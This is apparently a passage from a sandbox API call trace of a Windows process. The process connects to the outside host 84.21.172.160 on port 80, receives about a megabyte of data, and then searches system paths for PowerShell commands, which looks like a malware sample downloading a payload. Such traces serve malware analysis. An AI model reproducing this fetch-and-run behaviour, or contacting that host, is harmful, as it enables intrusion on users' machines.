[117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x13c89f1d, FirstDnsSuffix=0x0), SizePointer=0x5a0e9cc*=0x7ec) returned 0x0 [0117.745] LocalFree (hMem=0x5bf9420) returned 0x0 [0117.747] WSAConnect (in: s=0x520, name=0x2afafe8*(sa_family=2, sin_port=0x50, sin_addr="84.21.172.160"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0117.765] closesocket (s=0x51c) returned 0 [0117.773] send (s=0x520, buf=0x2afbb24*, len=70, flags=0) returned 70 [0117.778] setsockopt (s=0x520, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0117.778] recv (in: s=0x520, buf=0x2af783c, len=4096, flags=0 | out: buf=0x2af783c*) returned 4096 [0117.872] setsockopt (s=0x520, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0117.874] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 8972 [0117.875] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 3472 [0117.878] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 22624 [0117.878] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0117.941] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 57648 [0117.943] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0117.971] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 2532 [0117.971] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 1264 [0117.982] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.014] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 1072 [0118.015] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.029] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 4160 [0118.029] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.060] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 8320 [0118.060] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 1248 [0118.072] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.092] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 8516 [0118.093] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 3472 [0118.100] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 668 [0118.101] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.120] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 8516 [0118.120] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 3472 [0118.130] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 668 [0118.131] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.150] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 15776 [0118.151] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.180] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 21356 [0118.181] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.210] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 21344 [0118.211] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.240] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 28604 [0118.252] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 1192 [0118.252] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.274] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 28844 [0118.275] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.302] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 35840 [0118.303] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.330] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 40180 [0118.331] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.363] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 41620 [0118.365] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.393] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 47424 [0118.394] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 65536 [0118.424] recv (in: s=0x520, buf=0x2b0df04, len=65536, flags=0 | out: buf=0x2b0df04*) returned 50312 [0118.425] recv (in: s=0x520, buf=0x2b0df04, len=50007, flags=0 | out: buf=0x2b0df04*) returned 50007 [0118.451] SetEvent (hEvent=0x41c) returned 1 [0118.462] shutdown (s=0x520, how=2) returned 0 [0118.463] closesocket (s=0x520) returned 0 [0148.987] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e9c4, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0149.008] EtwEventActivityIdControl () returned 0x0 [0149.009] EtwEventActivityIdControl () returned 0x0 [0149.009] EtwEventActivityIdControl () returned 0x0 [0149.289] CoCreateGuid (in: pguid=0x5a0ec3c | out: pguid=0x5a0ec3c*(Data1=0x4933b46b, Data2=0x65d5, Data3=0x42b6, Data4=([0]=0x9c, [1]=0xf0, [2]=0xd5, [3]=0x4b, [4]=0x89, [5]=0x7f, [6]=0x88, [7]=0xf6))) returned 0x0 [0149.290] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0ea10 | out: lpPerformanceCount=0x5a0ea10*=2943410083044) returned 1 [0149.391] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x6279b8*=0x324, lpdwindex=0x5a0e264 | out: lpdwindex=0x5a0e264) returned 0x0 [0149.669] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0e9d8 | out: lpPerformanceCount=0x5a0e9d8*=2943447982085) returned 1 [0149.670] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e504, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0149.671] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5a0e420, nSize=0xc9 | out: lpBuffer="") returned 0xc8 [0149.671] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0e40c, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0149.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5bc3b18 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a [0149.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0e414, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0149.673] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.673] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0149.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e320) returned 1 [0149.673] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x5a0e5e4 | out: lpFileInformation=0x5a0e5e4*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x46c57d00, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x46c57d00, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x46c57d00, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e31c) returned 1 [0149.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e5dc) returned 1 [0149.674] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.674] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0149.675] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\.*"), lpFindFileData=0x5a0e38c | out: lpFindFileData=0x5a0e38c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e334) returned 1 [0149.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e594) returned 1 [0149.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0149.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e320) returned 1 [0149.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x5a0e5e4 | out: lpFileInformation=0x5a0e5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x26f5fe20, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x26f5fe20, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0149.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e31c) returned 1 [0149.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e5dc) returned 1 [0149.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0149.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.678] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\.*" (normalized: "c:\\windows\\syswow64\\.*"), lpFindFileData=0x5a0e38c | out: lpFindFileData=0x5a0e38c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e334) returned 1 [0149.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e594) returned 1 [0149.678] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0149.678] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0149.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e320) returned 1 [0149.678] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x5a0e5e4 | out: lpFileInformation=0x5a0e5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd3858bf0, ftLastAccessTime.dwHighDateTime=0x1d8c12f, ftLastWriteTime.dwLowDateTime=0xd3858bf0, ftLastWriteTime.dwHighDateTime=0x1d8c12f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0149.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e31c) returned 1 [0149.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e5dc) returned 1 [0149.679] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0149.679] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0149.679] FindFirstFileW (in: lpFileName="C:\\Windows\\.*" (normalized: "c:\\windows\\.*"), lpFindFileData=0x5a0e38c | out: lpFindFileData=0x5a0e38c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e334) returned 1 [0149.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e594) returned 1 [0149.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0149.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0149.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e320) returned 1 [0149.680] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\syswow64\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x5a0e5e4 | out: lpFileInformation=0x5a0e5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x123dcea, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x496a9b80, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496a9b80, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0149.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e31c) returned 1 [0149.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e5dc) returned 1 [0149.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0149.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0149.681] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\.*" (normalized: "c:\\windows\\syswow64\\wbem\\.*"), lpFindFileData=0x5a0e38c | out: lpFindFileData=0x5a0e38c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e334) returned 1 [0149.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e594) returned 1 [0149.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0149.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0149.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e320) returned 1 [0149.688] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x5a0e5e4 | out: lpFileInformation=0x5a0e5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e31c) returned 1 [0149.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e5dc) returned 1 [0149.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0149.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0149.689] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\.*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\.*"), lpFindFileData=0x5a0e38c | out: lpFindFileData=0x5a0e38c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e334) returned 1 [0149.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e594) returned 1 [0149.689] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e478, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0149.690] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5a0e394, nSize=0xc9 | out: lpBuffer="") returned 0xc8 [0149.690] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0e380, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0149.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5bc3b18 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a [0149.690] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0e388, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0149.690] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.690] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0149.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e294) returned 1 [0149.691] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x5a0e558 | out: lpFileInformation=0x5a0e558*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x46c57d00, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x46c57d00, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x46c57d00, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e290) returned 1 [0149.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e550) returned 1 [0149.691] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.691] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0149.691] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-.*"), lpFindFileData=0x5a0e300 | out: lpFindFileData=0x5a0e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2a8) returned 1 [0149.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e508) returned 1 [0149.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0149.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e294) returned 1 [0149.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x5a0e558 | out: lpFileInformation=0x5a0e558*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x26f5fe20, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x26f5fe20, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0149.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e290) returned 1 [0149.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e550) returned 1 [0149.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0149.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.693] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-.*" (normalized: "c:\\windows\\syswow64\\get-.*"), lpFindFileData=0x5a0e300 | out: lpFindFileData=0x5a0e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2a8) returned 1 [0149.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e508) returned 1 [0149.693] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0149.693] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0149.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e294) returned 1 [0149.693] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x5a0e558 | out: lpFileInformation=0x5a0e558*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd3858bf0, ftLastAccessTime.dwHighDateTime=0x1d8c12f, ftLastWriteTime.dwLowDateTime=0xd3858bf0, ftLastWriteTime.dwHighDateTime=0x1d8c12f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 